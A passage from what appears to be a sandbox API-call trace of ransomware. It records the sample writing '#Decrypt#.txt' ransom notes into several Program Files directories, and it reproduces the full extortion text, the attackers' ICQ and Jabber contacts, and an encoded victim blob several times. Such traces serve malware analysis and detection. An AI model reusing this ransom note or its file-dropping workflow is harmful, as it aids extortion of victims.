dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0252.267] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 0 [0252.267] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0252.267] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\#Decrypt#.txt") returned 89 [0252.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.270] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.270] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0252.271] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0252.271] CloseHandle (hObject=0x1a4) returned 1 [0252.271] GetProcessHeap () returned 0x780000 [0252.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.271] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName="1033", cAlternateFileName="")) returned 0 [0252.271] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0252.271] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\#Decrypt#.txt") returned 84 [0252.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.272] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.272] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0252.273] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.274] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0252.274] CloseHandle (hObject=0x158) returned 1 [0252.274] GetProcessHeap () returned 0x780000 [0252.274] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.274] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0252.274] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0252.274] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\#Decrypt#.txt") returned 74 [0252.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0252.275] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.275] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0252.276] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.276] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0252.276] CloseHandle (hObject=0x21c) returned 1 [0252.276] GetProcessHeap () returned 0x780000 [0252.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0252.276] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="10", cAlternateFileName="")) returned 0 [0252.277] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0252.277] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\#Decrypt#.txt") returned 71 [0252.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.277] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.277] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.278] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.278] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.279] CloseHandle (hObject=0x1cc) returned 1 [0252.279] GetProcessHeap () returned 0x780000 [0252.279] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.279] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0252.279] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0252.279] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\#Decrypt#.txt") returned 62 [0252.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0252.282] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.282] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0252.283] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi